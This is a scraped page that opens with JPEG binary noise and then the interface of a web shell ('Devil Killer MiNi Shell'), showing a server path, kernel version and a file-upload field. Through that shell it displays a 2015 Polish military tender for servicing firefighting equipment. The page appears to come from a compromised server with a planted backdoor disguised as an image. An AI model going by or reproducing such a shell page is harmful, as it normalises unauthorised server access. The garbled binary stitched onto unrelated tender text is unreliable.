JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150219/37834-N-2015.html

<p class="kh_header"><b>Grudziądz: PRZEGLĄDY SPRZĘTU POŻARNICZEGO - SPRAWA 4/2015</b><br>
<b>Numer ogłoszenia: 37834 - 2015; data zamieszczenia: 19.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 13 Wojskowy Oddział Gospodarczy (Jednostka Wojskowa 4503 ) , ul. Czwartaków 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 458 32 90, 458 32 00, faks 56 458 32 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.13wog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa sektora finansów publicznych - wojsko.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEGLĄDY SPRZĘTU POŻARNICZEGO - SPRAWA 4/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są przeglądy sprzętu pożarniczego zgodnie z wymaganiami określonymi poniżej oraz warunkami wyszczególnionymi w ogólnych warunkach umowy i ilościach określonych w formularzu ofertowym, według zadań następująco:
1)ZADANIE NR 1: Przegląd okresowy narzędzi hydraulicznych Holmatro - DPU 62P25, 2060 PU Core, DPU 61 P20;
2)ZADANIE NR 2: Przegląd okresowy pompy Lukas P-620 SG i narzędzi hydraulicznych;
3)ZADANIE NR 3: Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych COLTRI MCH-6 ETC, CTC- 100 GX 160;   
4)ZADANIE NR 4: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych MSA 100 EFI;
5)ZADANIE NR 5:  Przegląd  okresowy  kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000 - TE;
6)ZADANIE NR 6:  Przegląd  okresowy  aparatów powietrznych nadciś.: FENZY AERIS, masek aparatów oraz butli kompozytowych;
7)ZADANIE NR 7:  Przegląd okresowy pił spalinowych MS-290 STIHL;
8)ZADANIE NR 8:  Przegląd okresowy przecinarek spalinowych do stali i betonu TS-400, TS-800;
9)ZADANIE NR 9: Przegląd okresowy autopompy i układu wodno pianowego w samochodach pożarniczych typu: STAR  P142CJ  A24/10, STAR 14.225  A20/10, JELCZ 014 A32/10, Jelcz 010 A32/10, STAR 12.227 Zigler FP 16/8, SCANIA G440 CB 6x6 EHZ;
10)ZADANIE NR 10: Przegląd okresowy motopomp pożarniczych M8/8-1 silnik Kohler, M8/8 - PO7, pomp pływających Niagara 1 M4/2, Niagara Plus M4/2, Posejdon M8/2, pompy szlamowej KTH 80X Honda, pomp półszlamowych SST-50;
11)ZADANIE NR 11: Przegląd okresowy agregatów prądotwórczych GX 200 Honda, ED - 2400  GX 160 Honda, Fogo FH5540, silnik Honda GX270,  GX 240 Honda Geko 4500 ED, G 200 Honda Geko 2500, FOGO FV 5540 X - silnik Briggs Stratton 9HP;
12)ZADANIE NR 12: Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096 - 3264;
13)ZADANIE NR 13: Przegląd okresowy poduszek niskociśnieniowych Vetter;
14)ZADANIE NR 14: Przegląd okresowy poduszek wysokociśnieniowych Holmatro;
15)ZADANIE NR 15: Przegląd okresowy wentylatorów nadciśnieniowych PH-VP 450;
16)ZADANIE NR 16: Przegląd okresowy Agregatu pompowego 8000/8 na przyczepie;
17)ZADANIE NR 17: Przegląd okresowy motopomp pożarniczych TOHATSU M8/8, TOHATSU VC 72 AS.
2.Zakres wykonania usług przeglądów okresowych określonych jak powyżej należy wykonać co najmniej zgodnie z:
1)Zakresem prac wyszczególnionym poniżej oraz warunkami umowy;
2)Polskimi Normami ogólnie dostępnymi m.in. w Komitecie Normalizacyjnym;
3)Instrukcjami obsługi lub eksploatacji danego urządzenia lub narzędzi oraz obowiązującej dokumentacji techniczno-ruchowej sprzętu;
4)Obowiązującymi przepisami w zakresie wykonywanej usługi.
3.Wymagany minimalny zakres czynności:
1)ZADANIE NR 1:  Przegląd okresowy narzędzi hydraulicznych Holmatro - DPU 62P25, 2060 PU Core, DPU 61 P20
Nazwa czynności:		
1)wymiana filtrów powietrza
2)wymiana świec zapłonowych
3)sprawdzenie układu rozruchu  silnika               
4)sprawdzenie parametrów pracy silnika
5)sprawdzenie szczelności zwijadeł
6)sprawdzenie szczelności przyłączy kości zwijadeł
7)sprawdzenie szczelności króćca zaworu
8)sprawdzenie szczelności kości przyłącza
9)sprawdzenie szczelności szybkozłącza pompy
10)sprawdzenie szczelności szybkozłączy narzędzi
11)sprawdzenie szczelności i działania zaworu bezpieczeństwa
12)sprawdzenie ciśnienia maksymalnego
13)sprawdzenie sił nacisku i rozwarcia narzędzi
14)wymiana oleju hydraulicznego	
Ilość czynności w roku: raz w roku - wrzesień	
Ilość zestawów ogółem: 3 zestawy
ZESTAW: Holmatro - DPU 62P25 - 1 zestaw MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja
ZESTAW: 2060 PU Core - 1 zestaw MIEJSCE WYKONANIA USŁUGI:	Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
ZESTAW: DPU 61 P20 - 1 zestaw MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5
2)ZADANIE NR 2: Przegląd okresowy pompy Lukas P-620 SG i narzędzi hydraulicznych
Nazwa czynności:		
1)wymiana filtrów powietrza
2)wymiana świec zapłonowych 
3)sprawdzenie układu rozruchu silnika                    
4)sprawdzenie parametrów pracy silnika
5)sprawdzenie szczelności zwijadeł
6)sprawdzenie szczelności przyłączy kości zwijadeł
7)sprawdzenie szczelności króćca zaworu
8)sprawdzenie szczelności kości przyłącza
9)sprawdzenie szczelności szybkozłącza pompy
10)sprawdzenie szczelności szybkozłączy narzędzi
11)sprawdzenie szczelności zaworu bezpieczeństwa
12)sprawdzenie ciśnienia maksymalnego
13)sprawdzenie sił nacisku i rozwarcia narzędzi
14)wymiana oleju hydraulicznego	
Ilość czynności w roku: raz w roku - lipiec	
Ilość zestawów ogółem:1 zestaw
ZESTAW: pompa Lukas P-620 SG i narzędzi hydraulicznych - 1 zestaw MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5
3)ZADANIE NR 3: Przegląd okresowy kompresorów elektrycznych do ładowania butli aparatów powietrznych COLTRI MCH-6 ETC, CTC- 100 GX 160
Nazwa czynności:
1)wymiana filtra oczyszczania powietrza 
2)wymiana filtra wstępnego powietrza 
3)wymiana oleju 
4)sprawdzenie działania zaworu bezpieczeństwa
5)sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021 
6)dokonanie przeglądu  poprawności działania przyrządów pomiarowych
7)wymiana paska napędowego	
Ilość czynności w roku:dwa razy w roku:maj,listopad	
Ilość sprzętu ogółem: 4 szt.

SPRZĘT:Aparaty powietrzne COLTRI MCH-6 ETC-3 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
SPRZĘT:Aparaty powietrzne CTC- 100 GX 160 -	1 szt.	MIEJSCE WYKONANIA USŁUGI:Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 
- Skład Gardeja 
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5
4)ZADANIE NR 4: Przegląd okresowy kompresora elektrycznego do ładowania butli aparatów powietrznych MSA 100 EFI
Nazwa czynności:		
1)wymiana filtra oczyszczania powietrza  
2)wymiana filtra wstępnego powietrza 
3)wymiana oleju 
4)sprawdzenie działania zaworu bezpieczeństwa
5)sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021 
6)dokonanie przeglądu poprawności działania przyrządów pomiarowych 
7)wymiana paska napędowego	
Ilość czynności w roku: dwa razy w roku: maj,listopad	
Ilość sprzętu ogółem: 1 szt.

SPRZĘT:kompresor elektryczny do ładowania butli aparatów powietrznych - MSA 100EFI - 1 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5

5)ZADANIE NR 5: Przegląd  okresowy  kompresora elektrycznego do ładowania butli aparatów powietrznych Bauer Posejdon PE 3000 - TE
Nazwa czynności:		
1)wymiana filtra oczyszczania powietrza
2)wymiana filtra wstępnego powietrza
3)wymiana oleju
4)sprawdzenie działania zaworu bezpieczeństwa
5)sprawdzenie czystości powietrza zgodnie z normą PN-EN 12021 
6)dokonanie przeglądu  
7)poprawności działania  przyrządów pomiarowych  
8)wymiana paska napędowego	
Ilość czynności w roku: dwa razy w roku:maj,listopad	
Ilość sprzętu ogółem: 1 szt.

SPRZĘT:kompresor elektryczny do ładowania butli aparatów powietrznych -   Bauer Posejdon PE 3000-TE  - 1 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5
6)ZADANIE NR 6:  Przegląd  okresowy  aparatów powietrznych nadciś.: FENZY AERIS, masek aparatów oraz butli kompozytowych
Nazwa czynności		
1)sprawdzenie szczelności, konserwacja ,badanie dynamiczne na sztucznym płucu, dezynfekcja, kontrola końcowa, dopuszczenie do użytku, wpis do książki paszportowej.
2)dokonanie przeglądu poprawności działania przyrządów pomiarowych
3)wymiana membram wydechowych zaworów w półmaskach
4)wymiana uszczelek pod łącznik air klik
5)wymiana przy jednym aparacie pokrętła reduktora PF nr 1609787 (1 szt.)	
Ilość czynności w roku: dwa razy w roku: maj,listopad	
Ilość sprzętu ogółem: 39 szt.
SPRZĘT:aparaty powietrzne nadciś. FENZY AERIS, maski aparatów oraz butle kompozytowe -36 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:aparaty powietrzne nadciś. FENZY AERIS, maski aparatów oraz butle kompozytowe - 3 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5
7)ZADANIE NR 7:  Przegląd okresowy pił spalinowych MS-290 STIHL
Nazwa czynności:	
1)wymiana filtra powietrza
2)wymiana świec zapłonowych
3)sprawdzenie działania układu rozruchowego silnika
4)sprawdzenie parametrów pracy silnika
5)sprawdzenie działania hamulca bezpieczeństwa
6)wymiana smoczka 
7)ostrzenie łańcucha
8)regulacja naciągu łańcucha
9)regulacja pracy silnika	
Ilość czynności w roku: raz w roku: sierpień	
Ilość sprzętu ogółem:16 szt.

Sprzęt:piły spalinowe MS-290 STIHL - 14 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:piły spalinowe MS-290 STIHL- 2 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 
- Skład Gardeja
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5

8)ZADANIE NR 8: Przegląd okresowy przecinarek spalinowych do stali i betonu TS-400, TS-800
Nazwa czynności:		
1)wymiana filtra powietrza
2)wymiana świec zapłonowych
3)sprawdzenie działania układu rozruchowego silnika
4)sprawdzenie parametrów pracy silnika
5)sprawdzenie działania hamulca bezpieczeństwa
6)wymiana smoczka
7)wymiana paska klinowego
8)sprawdzenie mocowania tarczy tnącej
9)regulacja pracy silnika	
Ilość czynności w roku: raz w roku: sierpień	
Ilość sprzętu ogółem: 8 szt.
 
Sprzęt: przecinarki spalinowych do stali i betonu TS-400 - 5 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz 
ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:przecinarki spalinowych do stali i betonu TS-800 -3 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)

Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5

9)ZADANIE NR 9: Przegląd okresowy autopompy i układu wodno pianowego w samochodach pożarniczych typu: STAR  P142CJ  A24/10, STAR 14.225  A20/10, JELCZ 014 A32/10, Jelcz 010 A32/10, STAR 12.227 Zigler FP 16/8, SCANIA G440 CB 6x6 EHZ
Nazwa czynności:	
1)sprawdzenie szczelności autopompy
2)przegląd autopompy - smarowanie
3)przegląd skrzyni napędowej autopompy
4)przegląd wału napędowego autopompy
5)przegląd urządzenia zasysającego
6)przegląd zaworu głównego
7)przegląd zaworów tłocznych
8)przegląd manometrów i manowakuometrów
9)sprawdzenie instalacji  elektrycznej i automatyki sterowania autopompy
10)próba sprawności podzespołów wodno-pianowych ,ciśnienia i wydajności autopompy,
11)dokonanie przeglądu  poprawności działania przyrządów pomiarowych	
Ilość czynności w roku: raz w roku: czerwiec	
Ilość sprzętu ogółem: 12 szt.

 Uwaga!  Dodatkowo w pojeździe Scania G440 CB 6x6 EHZ należy dokonać:
- wymiany oleju w trokomacie
- sprawdzenie prawidłowej pracy systemu proszkowego
- sprawdzenie szczelności układu sterowania
- sprawdzenie prawidłowej pracy działka proszkowego (sprawdzenie układu sterowania)

Autopompy i układ wodno pianowy w samochodach pożarniczych typu:		
STAR P142CJ A24/10 - 3 szt.	
STAR 14.225 A20/10 - 1 szt.	
JELCZ 014 A32/10 - 3 szt.	
Jelcz 010 A32/10 -1 szt.	
STAR 12.227 Zigler Fp 16/8 - 3 szt.	
SCANIA G440 CB 6x6 EHZ - 1 szt.	
MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5


10)ZADANIE NR 10:Przegląd okresowy motopomp pożarniczych M8/8-1 silnik Kohler, M8/8 - PO7, pomp pływających Niagara 1 M4/2, Niagara Plus M4/2, Posejdon M8/2, pompy szlamowej KTH 80X Honda, pomp półszlamowych SST-50
Nazwa czynności:		
1)sprawdzenie szczelności pompy
2)przegląd elektroniki silnika
3)sprawdzenie regulatora obrotów
4)przegląd pompy jakiej
5)przegląd pompy zasysającej
6)wymiana oleju w regulatorze obrotów
7)sprawdzenie gaźnika
8)wymiana świec zapłonowych
9)wymiana filtra powietrza,
10)dokonanie próby szczelności i ciśnienia
11)przegląd trokomatów
12)wymiana filtra paliwa	
Ilość czynności w roku: raz w roku: czerwiec	
Ilość sprzętu ogółem: 13 szt.

Sprzęt:motopompa pożarnicza M8/8-1 silnik Kohler -1 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:motopompa pożarnicza M8/8 - PO7 - 1 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja
Sprzęt: pompy pływające Niagara 1 M4/2	 - 2 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:pompa pływająca Niagara Plus M4/2 - 1 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:pompy pływające Posejdon M8/2 -1 szt.	MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 
- Skład Gardeja
Sprzęt:pompy pływające Posejdon M8/2 - 4 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:pompa szlamowa KTX 80X Honda - 1 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:pompy półszlamowa SST-50 - 2 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5

11)ZADANIE NR 11:Przegląd okresowy agregatów prądotwórczych GX 200 Honda, ED - 2400  GX 160 Honda, Fogo FH5540, silnik Honda GX270,  GX 240 Honda Geko 4500 ED, G 200 Honda Geko 2500, FOGO FV 5540 X - silnik Briggs Stratton 9HP
Nazwa czynności:		
1)przegląd elektroniki silnika
2)wymiana świec zapłonowych
3)wymiana filtra powietrza
4)wymiana oleju w silniku
5)wymiana filtra oleju
6)sprawdzenie parametrów pracy silnika
7)sprawdzenie parametrów pod obciążeniem (moc max)
8)sprawdzenie zabezpieczenia prądnicy
9)kontrola gniazd wtykowych poboru energii
10)dokonanie przeglądu poprawności działania przyrządów pomiarowych	
Ilość czynności w roku: raz w roku: czerwiec	
Ilość sprzętu ogółem: 10 szt.

Sprzęt: agregaty prądotwórcze GX 200 Honda -	 3 szt.MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
agregat prądotwórczy
Sprzęt: ED - 2400 GX 160 Honda - 1 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt: agregaty prądotwórcze Fogo FH5540, silnik Honda GX270 - 2 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:agregaty prądotwórcze GX 240 Honda Geko 4500 ED - 1 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja
Sprzęt:agregaty prądotwórcze G 200 Honda Geko 2500 - 1 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja
Sprzęt:agregaty prądotwórcze FOGO FV 5540 X - silnik Briggs Stratton 9HP - 2 szt.	MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5

12)ZADANIE NR 12: Przegląd okresowy oraz kalibracja mierników gazów wybuchowych SCOTT 096 - 3264
Nazwa czynności: przegląd i kalibracja	
Ilość czynności w roku: dwa razy w roku:kwiecień,październik
Ilość sprzętu ogółem: 5 szt.

Sprzęt: mierniki gazów wybuchowych SCOTT 096-3264 - 5 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5

13)ZADANIE NR 13:Przegląd okresowy poduszek niskociśnieniowych Vetter
Nazwa czynności:		
1)sprawdzenie szczelności, przegląd reduktorów i sterowników 
2)dokonanie przeglądu  poprawności działania przyrządów pomiarowych	
Ilość czynności w roku: raz w roku: wrzesień	
Ilość zestawów ogółem: 2 zestawy

Sprzęt: Poduszki niskociśnieniowe Vetter - 1 zestaw MIEJSCE WYKONANIA USŁUGI:	Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:Poduszki niskociśnieniowe Vetter - 1 zestaw MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5
14)ZADANIE NR 14:Przegląd okresowy poduszek wysokociśnieniowych Holmatro
Nazwa czynności:		
1)sprawdzenie szczelności,    
2)przegląd reduktorów i sterowników
3)dokonanie przeglądu poprawności działania przyrządów pomiarowych	
Ilość czynności w roku: raz w roku: wrzesień	
Ilość zestawów ogółem: 4 zestawy

Sprzęt:Poduszki wysokociśnieniowe Holmatro - 4 zestawy MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5
15)ZADANIE NR 15:  Przegląd okresowy wentylatorów nadciśnieniowych PH-VP 450
Nazwa czynności:1)wymiana oleju
2)wymiana filtrów
3)wymiana świec zapłonowych
4)przegląd zespołów elektroniki	
Ilość czynności w roku: raz w roku: sierpień	
Ilość ogółem: 11 szt.

Sprzęt: Wentylator nadciśnieniowy PH-VP 450 -10 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz 
ul. Dworcowa - teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:Wentylator nadciśnieniowy PH-VP 450 - 1 szt. MIEJSCE WYKONANIA USŁUGI: Jamy gm. Rogóźno - teren Jednostki Wojskowej 4224 - Skład Gardeja

Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5
16)ZADANIE NR 16:  Przegląd okresowy Agregatu pompowego 8000/8 na przyczepie
Nazwa czynności:		
1)wymiana oleju
2)wymiana filtra paliwa
3)wymiana świec zapłonowych
4)przeprowadzenie próby ciśnieniowej pod kątem  szczelności	
Ilość czynności w roku: raz w roku: wrześniu	
Ilość ogółem: 1 szt.

Sprzęt: Agregatu pompowego 8000/8 na przyczepie - 1 szt.	 MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)

Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5
17)ZADANIE NR 17: Przegląd okresowy motopomp pożarniczych TOHATSU M8/8,TOHATSU VC 72 AS
Nazwa czynności:		
1)sprawdzenie szczelności pompy
2)przegląd elektroniki silnika
3)sprawdzenie regulatora obrotów
4)przegląd pompy 
5)przegląd pompy zasysającej
6)wymiana oleju w regulatorze obrotów
7)sprawdzenie gaźnika
8)wymiana świec zapłonowych
9)wymiana filtra powietrza
10)dokonanie próby szczelności i ciśnienia
11)przegląd  trokomatów
12)wymiana filtra paliwa	
Ilość czynności w roku: raz w roku: październik	
Ilość ogółem - 14 szt.

Sprzęt: motopompy pożarnicze TOHATSU M8/8 - 2 szt. MIEJSCE WYKONANIA USŁUGI: Grupa gm. Dragacz ul. Dworcowa  
- teren Centrum Szkolenia Logistyki (CSLog)
Sprzęt:motopompy pożarnicze TOHATSU VC 72 AS - 12 szt. MIEJSCE WYKONANIA USŁUGI:Grupa gm. Dragacz ul. Dworcowa  - teren Centrum Szkolenia Logistyki (CSLog)

Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 50413200-5
4.Wykonawca będzie zobowiązany do świadczenia usług stanowiących przedmiot zamówienia w cyklach jak określono powyżej.
